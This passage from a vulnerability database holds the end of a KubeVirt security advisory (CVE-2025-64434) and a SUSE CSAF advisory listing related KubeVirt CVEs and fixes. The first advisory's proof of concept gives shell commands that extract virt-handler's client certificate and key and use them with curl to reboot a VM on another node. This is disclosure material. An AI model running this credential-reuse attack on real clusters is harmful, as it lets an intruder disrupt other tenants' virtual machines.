because we don\u0027t have DNS or IP on the certs at the moment\n\t\t\t\tVerifyPeerCertificate: func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {\n\t\t\t\t\treturn verifyPeerCert(rawCerts, externallyManaged, certPool, x509.ExtKeyUsageClientAuth, \"client\")\n\t\t\t\t},\n\t\t\t\t//...\n}\n\nfunc verifyPeerCert(rawCerts [][]byte, externallyManaged bool, certPool *x509.CertPool, usage x509.ExtKeyUsage, commonName string) error {\n //...\n\trawPeer, rawIntermediates := rawCerts[0], rawCerts[1:]\n\tc, err := x509.ParseCertificate(rawPeer)\n\t//...\n\tfullCommonName := fmt.Sprintf(\"kubevirt.io:system:%s:virt-handler\", commonName)\n\tif !externallyManaged \u0026\u0026 c.Subject.CommonName != fullCommonName {\n\t\treturn fmt.Errorf(\"common name is invalid, expected %s, but got %s\", fullCommonName, c.Subject.CommonName)\n\t}\n\t//...\n```\n\n\nThe above code illustrates that client certificates accepted be KubeVirt should have as CN `kubevirt.io:system:client:virt-handler` which is the same as the CN present in the `virt-api`\u0027s certificate. **However, the latter is not the only component in the KubeVirt stack which can communicate with a `virt-handler` instance**. \n\nIn addition to the extension API server, any other `virt-handler` can communicate with it. This happens in the context of VM migration operations. When a VM is migrated from one node to another, the `virt-handler`s on both nodes are going to use structures called `ProxyManager` to communicate back and forth on the state of the migration. 
\n\n```go\n//pkg/virt-handler/migration-proxy/migration-proxy.go\n\nfunc NewMigrationProxyManager(serverTLSConfig *tls.Config, clientTLSConfig *tls.Config, config *virtconfig.ClusterConfig) ProxyManager {\n\treturn \u0026migrationProxyManager{\n\t\tsourceProxies: make(map[string][]*migrationProxy),\n\t\ttargetProxies: make(map[string][]*migrationProxy),\n\t\tserverTLSConfig: serverTLSConfig,\n\t\tclientTLSConfig: clientTLSConfig,\n\t\tconfig: config,\n\t}\n}\n```\n\n\nThis communication follows a classical client-server model, where the `virt-handler` on the migration source node acts as a client and the `virt-handler` on the migration destination node acts as a server. This communication is also secured using mTLS. The server certificate presented by the `virt-handler` acting as a migration destination node is the same as the one which is used for the communication between the same `virt-handler` and the `virt-api` in the context of VM lifecycle operations (`CN=kubevirt.io:system:node:virt-handler`). However, the client certificate which is used by a `virt-handler` instance has the same CN as the client certificate used by `virt-api`.\n\n\n\n```bash\nadmin@minikube:~$ openssl x509 -text -in $(CID=$(docker ps --filter \u0027Name=virt-handler\u0027 --format \u0027{{.ID}}\u0027 | head -n 1) \u0026\u0026 docker inspect $CID | grep \"clientcertificates:ro\" | cut -d \":\" -f1 | tr -d \u0027\"[:space:]\u0027)/tls.crt | grep -e \"Subject:\" -e \"Issuer:\" -e \"Serial\"\n\nSerial Number: 2951695854686290384 (0x28f687bdb791c1d0)\nIssuer: CN = kubevirt.io@1747579138\nSubject: CN = kubevirt.io:system:client:virt-handler\n\n```\n\nAlthough the migration procedure, where two separate `virt-handler` instances coordinate the transfer of a VM\u0027s state, is not directly tied to the communication between `virt-api` and `virt-handler` during VM lifecycle management, there is a critical overlap in the TLS authentication mechanism. 
Specifically, the client certificate used by both `virt-handler` and `virt-api` shares the same CN field, despite the use of different, randomly allocated ports, for the two types of communication.\n\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\nTo illustrate the vulnerability, a Minikube cluster has been deployed with two nodes (`minikube` and `minikube-m02`) thus, with two `virt-handler` instances alongside a vmi running on one of the nodes. It is considered that an attacker has obtained access to the client certificate bundle used by the `virt-handler` instance running on the compromised node (`minikube`) while the virtual machine is running on the other node (`minikube-m02`). Thus, they can interact with the sub-resource API exposed by the other `virt-handler` instance and control the lifecycle of the VMs running on the other node:\n\n\n```yaml\n# the deployed VMI on the non-compromised node minikube-m02\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n labels:\n kubevirt.io/size: small\n name: mishandling-common-name-in-certificate-handler\nspec:\n domain:\n devices:\n disks:\n - name: containerdisk\n disk:\n bus: virtio\n\n - name: cloudinitdisk\n disk:\n bus: virtio\n resources:\n requests:\n memory: 1024M\n terminationGracePeriodSeconds: 0\n volumes:\n - name: containerdisk\n containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo\n - name: cloudinitdisk \n cloudInitNoCloud:\n userDataBase64: SGkuXG4=\n```\n\n\n```bash\n# the IP of the non-compromised handler running on the node minikube-m02 is 10.244.1.3\nattacker@minikube:~$ curl -k https://10.244.1.3:8186/\ncurl: (56) OpenSSL SSL_read: error:0A00045C:SSL routines::tlsv13 alert certificate required, errno 0\n# get the certificate bundle directory and redo the request\nattacker@minikube:~$ export CERT_DIR=$(docker inspect $(docker ps --filter \u0027Name=virt-handler\u0027 --format=\u0027{{.ID}}\u0027 | head 
-n 1) | grep \"clientcertificates:ro\" | cut -d \u0027:\u0027 -f1 | tr -d \u0027\"[:space:]\u0027)\n\nattacker@minikube:~$ curl -k --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key https://10.244.1.3:8186/\n404: Page Not Found\n\n# soft reboot the VMI instance running on the other node\nattacker@minikube:~$ curl -ki --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key https://10.244.1.3:8186/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-handler/softreboot -XPUT\nHTTP/1.1 202 Accepted\n# the VMI mishandling-common-name-in-certificate-handler has been rebooted\n```\n\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nDue to the peer verification logic in `virt-handler` (via `verifyPeerCert`), an attacker who compromises a `virt-handler` instance, could exploit these shared credentials to impersonate `virt-api` and execute privileged operations against other `virt-handler` instances potentially compromising the integrity and availability of the managed by it VM.",
"id": "GHSA-ggp9-c99x-54gp",
"modified": "2025-11-27T08:48:13Z",
"published": "2025-11-06T23:35:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64434"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubevirt/kubevirt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "KubeVirt\u0027s Improper TLS Certificate Management Handling Allows API Identity Spoofing"
}
SUSE-SU-2026:20610-1
Vulnerability from csaf_suse - Published: 2026-02-27 08:49 - Updated: 2026-02-27 08:49Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt fixes the following issues:\n\nUpdate to version 1.7.0 (bsc#1257128).\n\nSecurity issues fixed:\n\n - CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially cause a DoS\n (bsc#1253189).\n - CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into\n creating empty files/directories on host (bsc#1257422).\n - CVE-2025-22872: incorrectly interpreted tags can cause content to be placed in the wrong scope during DOM construction\n (bsc#1241772).\n - CVE-2025-64432: failure to correctly validate certain fields in the client TLS certificate may allow an attacker to\n bypass existing RBAC controls (bsc#1253181).\n - CVE-2025-64433: improper symlink handling can allow reading arbitrary files (bsc#1253185).\n - CVE-2025-64434: a compromised virt-handler instance can impersonate virt-api and execute privileged operations\n (bsc#1253186).\n - CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).\n - CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users\n (bsc#1253748).\n\nOther updates and bugfixes:\n\n - Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLES-16.0-319",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20610-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20610-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620610-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20610-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024607.html"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt",
"tracking": {
"current_release_date": "2026-02-27T08:49:48Z",
"generator": {
"date": "2026-02-27T08:49:48Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20610-1",
"initial_release_date": "2026-02-27T08:49:48Z",
"revision_history": [
{
"date": "2026-02-27T08:49:48Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 16.0",
"product": {
"name": "SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product": {
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server-sap"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failure to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
